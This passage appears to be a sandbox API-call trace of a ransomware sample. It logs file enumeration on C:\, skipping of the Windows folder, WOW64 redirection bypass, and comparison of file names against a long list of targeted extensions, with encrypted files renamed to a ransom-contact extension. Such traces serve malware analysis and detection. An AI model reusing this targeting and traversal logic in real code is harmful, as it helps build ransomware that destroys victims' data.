Add-in\\nl\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\nl\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0178.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x703458 | out: hHeap=0x6a0000) returned 1 [0178.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x73b5e8 | out: hHeap=0x6a0000) returned 1 [0178.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3d80938 | out: hHeap=0x6a0000) returned 1 [0178.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3d90940 | out: hHeap=0x6a0000) returned 1 [0178.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3f7d020 | out: hHeap=0x6a0000) returned 1 [0178.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7035a8 | out: hHeap=0x6a0000) returned 1 [0178.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456ccd0 [0178.804] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456ccd0, Size=0x20) returned 0x458c240 [0178.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456cb38 [0178.805] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456cb38, Size=0x20) returned 0x458c178 [0178.805] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0178.805] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0178.805] Wow64DisableWow64FsRedirection (in: OldValue=0x33bff50 | out: OldValue=0x33bff50*=0x1) returned 1 [0178.805] lstrlenW (lpString="kernel32.dll") returned 12 [0178.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c178 | out: hHeap=0x6a0000) returned 1 [0178.805] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0178.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c240 | out: hHeap=0x6a0000) returned 1 Thread: id = 46 os_tid = 0xe84 [0155.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x3da0948 [0155.157] lstrlenW (lpString="C:") returned 2 [0155.157] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x34ffcf8 | out: lpFindFileData=0x34ffcf8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77850000, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0x6ba870 [0155.158] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0155.158] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent") returned 1 [0155.158] lstrlenW (lpString="$GetCurrent") returned 11 [0155.158] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="$GetCurrent") returned 1 [0155.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x3db0950 [0155.158] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0155.159] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\*", lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x6ba130 [0155.160] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0155.160] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Logs", cAlternateFileName="")) returned 1 [0155.161] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0155.161] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent\\Logs") returned 1 [0155.161] lstrlenW (lpString="Logs") returned 4 [0155.161] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="Logs") returned -1 [0155.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x3dc0958 [0155.161] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0155.161] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffff7b2, dwReserved1=0x5a5, cFileName=".", cAlternateFileName="")) returned 0x6ba170 [0155.164] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffff7b2, dwReserved1=0x5a5, cFileName="..", cAlternateFileName="")) returned 1 [0155.164] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd21ec45, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd21ec45, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd26b034, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xa7de, dwReserved0=0xfffff7b2, dwReserved1=0x5a5, cFileName="downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="DOWNLE~1.BAT")) returned 1 [0155.164] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[idecryptyourdata@cock.li].bat") returned 80 [0155.164] lstrlenW (lpString=".1cd") returned 4 [0155.164] lstrcmpiW (lpString1=".1cd", lpString2=".bat") returned -1 [0155.164] lstrlenW (lpString=".3ds") returned 4 [0155.164] lstrcmpiW (lpString1=".3ds", lpString2=".bat") returned -1 [0155.164] lstrlenW (lpString=".3fr") returned 4 [0155.164] lstrcmpiW (lpString1=".3fr", lpString2=".bat") returned -1 [0155.164] lstrlenW (lpString=".3g2") returned 4 [0155.164] lstrcmpiW (lpString1=".3g2", lpString2=".bat") returned -1 [0155.164] lstrlenW (lpString=".3gp") returned 4 [0155.165] lstrcmpiW (lpString1=".3gp", lpString2=".bat") returned -1 [0155.165] lstrlenW (lpString=".7z") returned 3 [0155.165] lstrcmpiW (lpString1=".7z", lpString2="bat") returned -1 [0155.165] lstrlenW (lpString=".accda") returned 6 [0155.165] lstrcmpiW (lpString1=".accda", lpString2="i].bat") returned -1 [0155.165] lstrlenW (lpString=".accdb") returned 6 [0155.165] lstrcmpiW (lpString1=".accdb", lpString2="i].bat") returned -1 [0155.165] lstrlenW (lpString=".accdc") returned 6 [0155.165] lstrcmpiW (lpString1=".accdc", lpString2="i].bat") returned -1 [0155.165] lstrlenW (lpString=".accde") returned 6 [0155.165] lstrcmpiW (lpString1=".accde", lpString2="i].bat") returned -1 [0155.165] lstrlenW (lpString=".accdt") returned 6 [0155.165] lstrcmpiW (lpString1=".accdt", lpString2="i].bat") returned -1 [0155.165] lstrlenW (lpString=".accdw") returned 6 [0155.165] lstrcmpiW (lpString1=".accdw", lpString2="i].bat") returned -1 [0155.165] lstrlenW (lpString=".adb") returned 4 [0155.165] lstrcmpiW (lpString1=".adb", lpString2=".bat") returned -1 [0155.165] lstrlenW (lpString=".adp") returned 4 [0155.165] lstrcmpiW (lpString1=".adp", lpString2=".bat") returned -1 [0155.165] lstrlenW (lpString=".ai") returned 3 [0155.165] lstrcmpiW (lpString1=".ai", lpString2="bat") returned -1 [0155.165] lstrlenW (lpString=".ai3") returned 4 [0155.165] lstrcmpiW (lpString1=".ai3", lpString2=".bat") returned -1 [0155.165] lstrlenW (lpString=".ai4") returned 4 [0155.165] lstrcmpiW (lpString1=".ai4", lpString2=".bat") returned -1 [0155.165] lstrlenW (lpString=".ai5") returned 4 [0155.165] lstrcmpiW (lpString1=".ai5", lpString2=".bat") returned -1 [0155.166] lstrlenW (lpString=".ai6") returned 4 [0155.166] lstrcmpiW (lpString1=".ai6", lpString2=".bat") returned -1 [0155.166] lstrlenW (lpString=".ai7") returned 4 [0155.166] lstrcmpiW (lpString1=".ai7", lpString2=".bat") returned -1 [0155.166] lstrlenW (lpString=".ai8") returned 4 [0155.166] lstrcmpiW (lpString1=".ai8", lpString2=".bat") returned -1 [0155.166] lstrlenW (lpString=".anim") returned 5 [0155.166] lstrcmpiW (lpString1=".anim", lpString2="].bat") returned -1 [0155.166] lstrlenW (lpString=".arw") returned 4 [0155.166] lstrcmpiW (lpString1=".arw", lpString2=".bat") returned -1 [0155.166] lstrlenW (lpString=".as") returned 3 [0155.166] lstrcmpiW (lpString1=".as", lpString2="bat") returned -1 [0155.166] lstrlenW (lpString=".asa") returned 4 [0155.166] lstrcmpiW (lpString1=".asa", lpString2=".bat") returned -1 [0155.166] lstrlenW (lpString=".asc") returned 4 [0155.166] lstrcmpiW (lpString1=".asc", lpString2=".bat") returned -1 [0155.166] lstrlenW (lpString=".ascx") returned 5 [0155.166] lstrcmpiW (lpString1=".ascx", lpString2="].bat") returned -1 [0155.166] lstrlenW (lpString=".asm") returned 4 [0155.166] lstrcmpiW (lpString1=".asm", lpString2=".bat") returned -1 [0155.166] lstrlenW (lpString=".asmx") returned 5 [0155.166] lstrcmpiW (lpString1=".asmx", lpString2="].bat") returned -1 [0155.166] lstrlenW (lpString=".asp") returned 4 [0155.166] lstrcmpiW (lpString1=".asp", lpString2=".bat") returned -1 [0155.166] lstrlenW (lpString=".aspx") returned 5 [0155.166] lstrcmpiW (lpString1=".aspx", lpString2="].bat") returned -1 [0155.166] lstrlenW (lpString=".asr") returned 4 [0155.166] lstrcmpiW (lpString1=".asr", lpString2=".bat") returned -1 [0155.166] lstrlenW (lpString=".asx") returned 4 [0155.167] lstrcmpiW (lpString1=".asx", lpString2=".bat") returned -1 [0155.167] lstrlenW (lpString=".avi") returned 4 [0155.167] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0155.167] lstrlenW (lpString=".avs") returned 4 [0155.167] lstrcmpiW (lpString1=".avs", lpString2=".bat") returned -1 [0155.167] lstrlenW (lpString=".backup") returned 7 [0155.167] lstrcmpiW (lpString1=".backup", lpString2="li].bat") returned -1 [0155.167] lstrlenW (lpString=".bak") returned 4 [0155.167] lstrcmpiW (lpString1=".bak", lpString2=".bat") returned -1 [0155.167] lstrlenW (lpString=".bay") returned 4 [0155.167] lstrcmpiW (lpString1=".bay", lpString2=".bat") returned 1 [0155.167] lstrlenW (lpString=".bd") returned 3 [0155.167] lstrcmpiW (lpString1=".bd", lpString2="bat") returned -1 [0155.167] lstrlenW (lpString=".bin") returned 4 [0155.167] lstrcmpiW (lpString1=".bin", lpString2=".bat") returned 1 [0155.167] lstrlenW (lpString=".bmp") returned 4 [0155.167] lstrcmpiW (lpString1=".bmp", lpString2=".bat") returned 1 [0155.167] lstrlenW (lpString=".bz2") returned 4 [0155.167] lstrcmpiW (lpString1=".bz2", lpString2=".bat") returned 1 [0155.167] lstrlenW (lpString=".c") returned 2 [0155.167] lstrcmpiW (lpString1=".c", lpString2="at") returned -1 [0155.167] lstrlenW (lpString=".cdr") returned 4 [0155.167] lstrcmpiW (lpString1=".cdr", lpString2=".bat") returned 1 [0155.167] lstrlenW (lpString=".cer") returned 4 [0155.167] lstrcmpiW (lpString1=".cer", lpString2=".bat") returned 1 [0155.167] lstrlenW (lpString=".cf") returned 3 [0155.167] lstrcmpiW (lpString1=".cf", lpString2="bat") returned -1 [0155.167] lstrlenW (lpString=".cfc") returned 4 [0155.167] lstrcmpiW (lpString1=".cfc", lpString2=".bat") returned 1 [0155.167] lstrlenW (lpString=".cfm") returned 4 [0155.167] lstrcmpiW (lpString1=".cfm", lpString2=".bat") returned 1 [0155.168] lstrlenW (lpString=".cfml") returned 5 [0155.168] lstrcmpiW (lpString1=".cfml", lpString2="].bat") returned -1 [0155.168] lstrlenW (lpString=".cfu") returned 4 [0155.168] lstrcmpiW (lpString1=".cfu", lpString2=".bat") returned 1 [0155.168] lstrlenW (lpString=".chm") returned 4 [0155.168] lstrcmpiW (lpString1=".chm", lpString2=".bat") returned 1 [0155.168] lstrlenW (lpString=".cin") returned 4 [0155.168] lstrcmpiW (lpString1=".cin", lpString2=".bat") returned 1 [0155.168] lstrlenW (lpString=".class") returned 6 [0155.168] lstrcmpiW (lpString1=".class", lpString2="i].bat") returned -1 [0155.168] lstrlenW (lpString=".clx") returned 4 [0155.168] lstrcmpiW (lpString1=".clx", lpString2=".bat") returned 1 [0155.168] lstrlenW (lpString=".config") returned 7 [0155.168] lstrcmpiW (lpString1=".config", lpString2="li].bat") returned -1 [0155.168] lstrlenW (lpString=".cpp") returned 4 [0155.168] lstrcmpiW (lpString1=".cpp", lpString2=".bat") returned 1 [0155.168] lstrlenW (lpString=".cr2") returned 4 [0155.168] lstrcmpiW (lpString1=".cr2", lpString2=".bat") returned 1 [0155.168] lstrlenW (lpString=".crt") returned 4 [0155.168] lstrcmpiW (lpString1=".crt", lpString2=".bat") returned 1 [0155.168] lstrlenW (lpString=".crw") returned 4 [0155.168] lstrcmpiW (lpString1=".crw", lpString2=".bat") returned 1 [0155.168] lstrlenW (lpString=".cs") returned 3 [0155.168] lstrcmpiW (lpString1=".cs", lpString2="bat") returned -1 [0155.168] lstrlenW (lpString=".css") returned 4 [0155.168] lstrcmpiW (lpString1=".css", lpString2=".bat") returned 1 [0155.168] lstrlenW (lpString=".csv") returned 4 [0155.168] lstrcmpiW (lpString1=".csv", lpString2=".bat") returned 1 [0155.168] lstrlenW (lpString=".cub") returned 4 [0155.169] lstrcmpiW (lpString1=".cub", lpString2=".bat") returned 1 [0155.169] lstrlenW (lpString=".dae") returned 4 [0155.169] lstrcmpiW (lpString1=".dae", lpString2=".bat") returned 1 [0155.169] lstrlenW (lpString=".dat") returned 4 [0155.169] lstrcmpiW (lpString1=".dat", lpString2=".bat") returned 1 [0155.169] lstrlenW (lpString=".db") returned 3 [0155.169] lstrcmpiW (lpString1=".db", lpString2="bat") returned -1 [0155.169] lstrlenW (lpString=".dbf") returned 4 [0155.169] lstrcmpiW (lpString1=".dbf", lpString2=".bat") returned 1 [0155.169] lstrlenW (lpString=".dbx") returned 4 [0155.169] lstrcmpiW (lpString1=".dbx", lpString2=".bat") returned 1 [0155.169] lstrlenW (lpString=".dc3") returned 4 [0155.169] lstrcmpiW (lpString1=".dc3", lpString2=".bat") returned 1 [0155.169] lstrlenW (lpString=".dcm") returned 4 [0155.169] lstrcmpiW (lpString1=".dcm", lpString2=".bat") returned 1 [0155.169] lstrlenW (lpString=".dcr") returned 4 [0155.169] lstrcmpiW (lpString1=".dcr", lpString2=".bat") returned 1 [0155.169] lstrlenW (lpString=".der") returned 4 [0155.169] lstrcmpiW (lpString1=".der", lpString2=".bat") returned 1 [0155.169] lstrlenW (lpString=".dib") returned 4 [0155.169] lstrcmpiW (lpString1=".dib", lpString2=".bat") returned 1 [0155.169] lstrlenW (lpString=".dic") returned 4 [0155.169] lstrcmpiW (lpString1=".dic", lpString2=".bat") returned 1 [0155.169] lstrlenW (lpString=".dif") returned 4 [0155.169] lstrcmpiW (lpString1=".dif", lpString2=".bat") returned 1 [0155.169] lstrlenW (lpString=".divx") returned 5 [0155.169] lstrcmpiW (lpString1=".divx", lpString2="].bat") returned -1 [0155.169] lstrlenW (lpString=".djvu") returned 5 [0155.170] lstrcmpiW (lpString1=".djvu", lpString2="].bat") returned -1 [0155.170] lstrlenW (lpString=".dng") returned 4 [0155.170] lstrcmpiW (lpString1=".dng", lpString2=".bat") returned 1 [0155.170] lstrlenW (lpString=".doc") returned 4 [0155.170] lstrcmpiW (lpString1=".doc", lpString2=".bat") returned 1 [0155.170] lstrlenW (lpString=".docm") returned 5 [0155.170] lstrcmpiW (lpString1=".docm", lpString2="].bat") returned -1 [0155.170] lstrlenW (lpString=".docx") returned 5 [0155.170] lstrcmpiW (lpString1=".docx", lpString2="].bat") returned -1 [0155.170] lstrlenW (lpString=".dot") returned 4 [0155.170] lstrcmpiW (lpString1=".dot", lpString2=".bat") returned 1 [0155.170] lstrlenW (lpString=".dotm") returned 5 [0155.170] lstrcmpiW (lpString1=".dotm", lpString2="].bat") returned -1 [0155.170] lstrlenW (lpString=".dotx") returned 5 [0155.170] lstrcmpiW (lpString1=".dotx", lpString2="].bat") returned -1 [0155.170] lstrlenW (lpString=".dpx") returned 4 [0155.170] lstrcmpiW (lpString1=".dpx", lpString2=".bat") returned 1 [0155.170] lstrlenW (lpString=".dqy") returned 4 [0155.170] lstrcmpiW (lpString1=".dqy", lpString2=".bat") returned 1 [0155.170] lstrlenW (lpString=".dsn") returned 4 [0155.170] lstrcmpiW (lpString1=".dsn", lpString2=".bat") returned 1 [0155.170] lstrlenW (lpString=".dt") returned 3 [0155.170] lstrcmpiW (lpString1=".dt", lpString2="bat") returned -1 [0155.170] lstrlenW (lpString=".dtd") returned 4 [0155.170] lstrcmpiW (lpString1=".dtd", lpString2=".bat") returned 1 [0155.170] lstrlenW (lpString=".dwg") returned 4 [0155.170] lstrcmpiW (lpString1=".dwg", lpString2=".bat") returned 1 [0155.170] lstrlenW (lpString=".dwt") returned 4 [0155.171] lstrcmpiW (lpString1=".dwt", lpString2=".bat") returned 1 [0155.171] lstrlenW (lpString=".dx") returned 3 [0155.171] lstrcmpiW (lpString1=".dx", lpString2="bat") returned -1 [0155.171] lstrlenW (lpString=".dxf") returned 4 [0155.171] lstrcmpiW (lpString1=".dxf", lpString2=".bat") returned 1 [0155.171] lstrlenW (lpString=".edml") returned 5 [0155.171] lstrcmpiW (lpString1=".edml", lpString2="].bat") returned -1 [0155.171] lstrlenW (lpString=".efd") returned 4 [0155.171] lstrcmpiW (lpString1=".efd", lpString2=".bat") returned 1 [0155.171] lstrlenW (lpString=".elf") returned 4 [0155.171] lstrcmpiW (lpString1=".elf", lpString2=".bat") returned 1 [0155.171] lstrlenW (lpString=".emf") returned 4 [0155.171] lstrcmpiW (lpString1=".emf", lpString2=".bat") returned 1 [0155.171] lstrlenW (lpString=".emz") returned 4 [0155.171] lstrcmpiW (lpString1=".emz", lpString2=".bat") returned 1 [0155.171] lstrlenW (lpString=".epf") returned 4 [0155.171] lstrcmpiW (lpString1=".epf", lpString2=".bat") returned 1 [0155.171] lstrlenW (lpString=".eps") returned 4 [0155.171] lstrcmpiW (lpString1=".eps", lpString2=".bat") returned 1 [0155.171] lstrlenW (lpString=".epsf") returned 5 [0155.171] lstrcmpiW (lpString1=".epsf", lpString2="].bat") returned -1 [0155.171] lstrlenW (lpString=".epsp") returned 5 [0155.171] lstrcmpiW (lpString1=".epsp", lpString2="].bat") returned -1 [0155.171] lstrlenW (lpString=".erf") returned 4 [0155.171] lstrcmpiW (lpString1=".erf", lpString2=".bat") returned 1 [0155.171] lstrlenW (lpString=".exr") returned 4 [0155.171] lstrcmpiW (lpString1=".exr", lpString2=".bat") returned 1 [0155.171] lstrlenW (lpString=".f4v") returned 4 [0155.171] lstrcmpiW (lpString1=".f4v", lpString2=".bat") returned 1 [0155.172] lstrlenW (lpString=".fido") returned 5 [0155.172] lstrcmpiW (lpString1=".fido", lpString2="].bat") returned -1 [0155.172] lstrlenW (lpString=".flm") returned 4 [0155.172] lstrcmpiW (lpString1=".flm", lpString2=".bat") returned 1 [0155.172] lstrlenW (lpString=".flv") returned 4 [0155.172] lstrcmpiW (lpString1=".flv", lpString2=".bat") returned 1 [0155.172] lstrlenW (lpString=".frm") returned 4 [0155.172] lstrcmpiW (lpString1=".frm", lpString2=".bat") returned 1 [0155.172] lstrlenW (lpString=".fxg") returned 4 [0155.172] lstrcmpiW (lpString1=".fxg", lpString2=".bat") returned 1 [0155.172] lstrlenW (lpString=".geo") returned 4 [0155.172] lstrcmpiW (lpString1=".geo", lpString2=".bat") returned 1 [0155.172] lstrlenW (lpString=".gif") returned 4 [0155.172] lstrcmpiW (lpString1=".gif", lpString2=".bat") returned 1 [0155.172] lstrlenW (lpString=".grs") returned 4 [0155.172] lstrcmpiW (lpString1=".grs", lpString2=".bat") returned 1 [0155.172] lstrlenW (lpString=".gz") returned 3 [0155.172] lstrcmpiW (lpString1=".gz", lpString2="bat") returned -1 [0155.172] lstrlenW (lpString=".h") returned 2 [0155.172] lstrcmpiW (lpString1=".h", lpString2="at") returned -1 [0155.172] lstrlenW (lpString=".hdr") returned 4 [0155.172] lstrcmpiW (lpString1=".hdr", lpString2=".bat") returned 1 [0155.172] lstrlenW (lpString=".hpp") returned 4 [0155.172] lstrcmpiW (lpString1=".hpp", lpString2=".bat") returned 1 [0155.172] lstrlenW (lpString=".hta") returned 4 [0155.172] lstrcmpiW (lpString1=".hta", lpString2=".bat") returned 1 [0155.172] lstrlenW (lpString=".htc") returned 4 [0155.173] lstrcmpiW (lpString1=".htc", lpString2=".bat") returned 1 [0155.173] lstrlenW (lpString=".htm") returned 4 [0155.173] lstrcmpiW (lpString1=".htm", lpString2=".bat") returned 1 [0155.173] lstrlenW (lpString=".html") returned 5 [0155.173] lstrcmpiW (lpString1=".html", lpString2="].bat") returned -1 [0155.173] lstrlenW (lpString=".icb") returned 4 [0155.173] lstrcmpiW (lpString1=".icb", lpString2=".bat") returned 1 [0155.173] lstrlenW (lpString=".ics") returned 4 [0155.173] lstrcmpiW (lpString1=".ics", lpString2=".bat") returned 1 [0155.173] lstrlenW (lpString=".iff") returned 4 [0155.173] lstrcmpiW (lpString1=".iff", lpString2=".bat") returned 1 [0155.173] lstrlenW (lpString=".inc") returned 4 [0155.173] lstrcmpiW (lpString1=".inc", lpString2=".bat") returned 1 [0155.173] lstrlenW (lpString=".indd") returned 5 [0155.173] lstrcmpiW (lpString1=".indd", lpString2="].bat") returned -1 [0155.173] lstrlenW (lpString=".ini") returned 4 [0155.173] lstrcmpiW (lpString1=".ini", lpString2=".bat") returned 1 [0155.173] lstrlenW (lpString=".iqy") returned 4 [0155.173] lstrcmpiW (lpString1=".iqy", lpString2=".bat") returned 1 [0155.173] lstrlenW (lpString=".j2c") returned 4 [0155.173] lstrcmpiW (lpString1=".j2c", lpString2=".bat") returned 1 [0155.173] lstrlenW (lpString=".j2k") returned 4 [0155.173] lstrcmpiW (lpString1=".j2k", lpString2=".bat") returned 1 [0155.173] lstrlenW (lpString=".java") returned 5 [0155.173] lstrcmpiW (lpString1=".java", lpString2="].bat") returned -1 [0155.173] lstrlenW (lpString=".jp2") returned 4 [0155.174] lstrcmpiW (lpString1=".jp2", lpString2=".bat") returned 1 [0155.174] lstrlenW (lpString=".jpc") returned 4 [0155.174] lstrcmpiW (lpString1=".jpc", lpString2=".bat") returned 1 [0155.174] lstrlenW (lpString=".jpe") returned 4 [0155.174] lstrcmpiW (lpString1=".jpe", lpString2=".bat") returned 1 [0155.174] lstrlenW (lpString=".jpeg") returned 5 [0155.174] lstrcmpiW (lpString1=".jpeg", lpString2="].bat") returned -1 [0155.174] lstrlenW (lpString=".jpf") returned 4 [0155.174] lstrcmpiW (lpString1=".jpf", lpString2=".bat") returned 1 [0155.174] lstrlenW (lpString=".jpg") returned 4 [0155.174] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0155.174] lstrlenW (lpString=".jpx") returned 4 [0155.174] lstrcmpiW (lpString1=".jpx", lpString2=".bat") returned 1 [0155.174] lstrlenW (lpString=".js") returned 3 [0155.174] lstrcmpiW (lpString1=".js", lpString2="bat") returned -1 [0155.174] lstrlenW (lpString=".jsf") returned 4 [0155.174] lstrcmpiW (lpString1=".jsf", lpString2=".bat") returned 1 [0155.174] lstrlenW (lpString=".json") returned 5 [0155.174] lstrcmpiW (lpString1=".json", lpString2="].bat") returned -1 [0155.174] lstrlenW (lpString=".jsp") returned 4 [0155.174] lstrcmpiW (lpString1=".jsp", lpString2=".bat") returned 1 [0155.174] lstrlenW (lpString=".kdc") returned 4 [0155.174] lstrcmpiW (lpString1=".kdc", lpString2=".bat") returned 1 [0155.174] lstrlenW (lpString=".kmz") returned 4 [0155.174] lstrcmpiW (lpString1=".kmz", lpString2=".bat") returned 1 [0155.174] lstrlenW (lpString=".kwm") returned 4 [0155.174] lstrcmpiW (lpString1=".kwm", lpString2=".bat") returned 1 [0155.174] lstrlenW (lpString=".lasso") returned 6 [0155.175] lstrcmpiW (lpString1=".lasso", lpString2="i].bat") returned -1 [0155.175] lstrlenW (lpString=".lbi") returned 4 [0155.175] lstrcmpiW (lpString1=".lbi", lpString2=".bat") returned 1 [0155.175] lstrlenW (lpString=".lgf") returned 4 [0155.175] lstrcmpiW (lpString1=".lgf", lpString2=".bat") returned 1 [0155.175] lstrlenW (lpString=".lgp") returned 4 [0155.175] lstrcmpiW (lpString1=".lgp", lpString2=".bat") returned 1 [0155.175] lstrlenW (lpString=".log") returned 4 [0155.175] lstrcmpiW (lpString1=".log", lpString2=".bat") returned 1 [0155.175] lstrlenW (lpString=".m1v") returned 4 [0155.175] lstrcmpiW (lpString1=".m1v", lpString2=".bat") returned 1 [0155.175] lstrlenW (lpString=".m4a") returned 4 [0155.175] lstrcmpiW (lpString1=".m4a", lpString2=".bat") returned 1 [0155.175] lstrlenW (lpString=".m4v") returned 4 [0155.175] lstrcmpiW (lpString1=".m4v", lpString2=".bat") returned 1 [0155.175] lstrlenW (lpString=".max") returned 4 [0155.175] lstrcmpiW (lpString1=".max", lpString2=".bat") returned 1 [0155.175] lstrlenW (lpString=".md") returned 3 [0155.175] lstrcmpiW (lpString1=".md", lpString2="bat") returned -1 [0155.175] lstrlenW (lpString=".mda") returned 4 [0155.175] lstrcmpiW (lpString1=".mda", lpString2=".bat") returned 1 [0155.175] lstrlenW (lpString=".mdb") returned 4 [0155.175] lstrcmpiW (lpString1=".mdb", lpString2=".bat") returned 1 [0155.175] lstrlenW (lpString=".mde") returned 4 [0155.175] lstrcmpiW (lpString1=".mde", lpString2=".bat") returned 1 [0155.175] lstrlenW (lpString=".mdf") returned 4 [0155.176] lstrcmpiW (lpString1=".mdf", lpString2=".bat") returned 1 [0155.176] lstrlenW (lpString=".mdw") returned 4 [0155.176] lstrcmpiW (lpString1=".mdw", lpString2=".bat") returned 1 [0155.176] lstrlenW (lpString=".mef") returned 4 [0155.176] lstrcmpiW (lpString1=".mef", lpString2=".bat") returned 1 [0155.176] lstrlenW (lpString=".mft") returned 4 [0155.176] lstrcmpiW (lpString1=".mft", lpString2=".bat") returned 1 [0155.176] lstrlenW (lpString=".mfw") returned 4 [0155.176] lstrcmpiW (lpString1=".mfw", lpString2=".bat") returned 1 [0155.176] lstrlenW (lpString=".mht") returned 4 [0155.176] lstrcmpiW (lpString1=".mht", lpString2=".bat") returned 1 [0155.176] lstrlenW (lpString=".mhtml") returned 6 [0155.176] lstrcmpiW (lpString1=".mhtml", lpString2="i].bat") returned -1 [0155.176] lstrlenW (lpString=".mka") returned 4 [0155.176] lstrcmpiW (lpString1=".mka", lpString2=".bat") returned 1 [0155.176] lstrlenW (lpString=".mkidx") returned 6 [0155.176] lstrcmpiW (lpString1=".mkidx", lpString2="i].bat") returned -1 